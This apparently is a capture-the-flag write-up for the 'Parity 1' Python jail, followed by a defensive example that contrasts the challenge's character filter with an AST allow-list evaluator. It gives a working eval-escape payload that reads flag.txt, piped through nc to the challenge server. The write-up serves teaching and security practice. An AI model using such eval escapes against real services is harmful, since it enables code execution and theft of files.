Parity 1
Before you start
You can donate to me via Buy Me a Coffee or follow me on Github
Challenge Statement
#!/usr/local/bin/python3
inp = input("> ")
for i, v in enumerate(inp):
    if not (ord(v) < 128 and i % 2 == ord(v) % 2):
        print('bad')
        exit()
eval(inp)
Getting the Flag
We have a small script that checks each character of the user input for the following:
- If the ASCII code of the character is 128 or greater (non-ASCII).
- If the parity of the character's index differs from the parity of its ASCII code (for example, the index is odd but the code is even).
If either condition is met, the program prints bad and exits.
Our goal is to craft input in which every character conforms to these rules, so that it passes the check and reaches eval.
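An interesting point here is that eval is called in the global scope, with no restricted namespace, which allows us to execute code.
We can do something quite simple:
- Use the fact that \t (ASCII 9) is an odd number, and a space (ASCII 32) is an even number, so whitespace can be used as padding to fix the parity of whatever follows.
- The name open alternates between odd and even character codes, so it satisfies the challenge's conditions.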
open\t('f' + 'l' +"a"+"g"+ '.' + 't' + 'x' + 't' )
Now, we just need to find a way to read the file content, since we can't use the word read.
Luckily, there's a neat trick for that:
type([ ] )(open\t('f' + 'l' +"a"+"g"+ '.' + 't' + 'x' + 't' ) )
type([ ]) evaluates to list, and calling list on the open file object iterates over its lines, so this gives us the file's content locally.
>>> eval("""type([ ] )(open\t('f' + 'l' +"a"+"g"+ '.' + 't' + 'x' + 't' ) )""")
['jail{flag_will_be_here_on_remote}\n']
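Now, let's send this to the server. Wrapping the expression in an outer eval makes the server evaluate the first line of the file as Python; the flag is not valid syntax, so the SyntaxError traceback echoes it back to us.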
$ cat inject.py
inp = """eval\t(\ttype([ ] )(open\t('f' + 'l' +"a"+"g"+ '.' + 't' + 'x' + 't' ) ) [0] )"""
print(inp)
$ python3 Parity-1/python.py | nc challs2.pyjail.club 7991
> Traceback (most recent call last):
File "/app/run", line 9, in <module>
eval(inp)
File "<string>", line 1, in <module>
File "<string>", line 1
jail{parity_41f5812e8c0cd9}
^
SyntaxError: invalid syntax
Now head over to version 2 of the challenge, Parity 2.
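As an added example (not part of the original write-up or the challenge's code), the following Python puts the challenge's character filter beside a parse-then-allow-list evaluator, to show why filtering characters in front of eval does not constrain what the expression does. The function names and the arithmetic-only policy in ALLOWED are assumptions chosen for illustration.

```python
import ast

# Payload quoted from the write-up; "\t" becomes a real tab character.
PAYLOAD = """type([ ] )(open\t('f' + 'l' +"a"+"g"+ '.' + 't' + 'x' + 't' ) )"""

# Assumed policy (not from the challenge): numeric literals and + - * / only.
ALLOWED = (ast.Expression, ast.Constant, ast.BinOp, ast.UnaryOp,
           ast.Add, ast.Sub, ast.Mult, ast.Div, ast.USub, ast.UAdd)


def parity_ok(s):
    """The challenge's filter: ASCII only, index parity equals code parity."""
    return all(ord(c) < 128 and i % 2 == ord(c) % 2 for i, c in enumerate(s))


def first_forbidden(tree):
    """Name of the first AST node outside the allow-list, or None."""
    for node in ast.walk(tree):
        if not isinstance(node, ALLOWED):
            return type(node).__name__
        if isinstance(node, ast.Constant) and type(node.value) not in (int, float):
            return "non-numeric Constant"
    return None


def safe_eval(s):
    """Parse first, reject any name, call or attribute, then evaluate."""
    tree = ast.parse(s.strip(), mode="eval")
    bad = first_forbidden(tree)
    if bad is not None:
        raise ValueError(f"rejected before evaluation: {bad}")
    return eval(compile(tree, "<expr>", "eval"), {"__builtins__": {}}, {})


if __name__ == "__main__":
    print("parity filter accepts payload:", parity_ok(PAYLOAD))
    try:
        safe_eval(PAYLOAD)
    except ValueError as exc:
        print("allow-list:", exc)
    print("allow-list evaluates 1 + 2 * 3 =", safe_eval("1 + 2 * 3"))
```

The parity filter accepts the payload because it only constrains how the text is spelled, while the allow-list rejects it at the first Call node, before anything is executed.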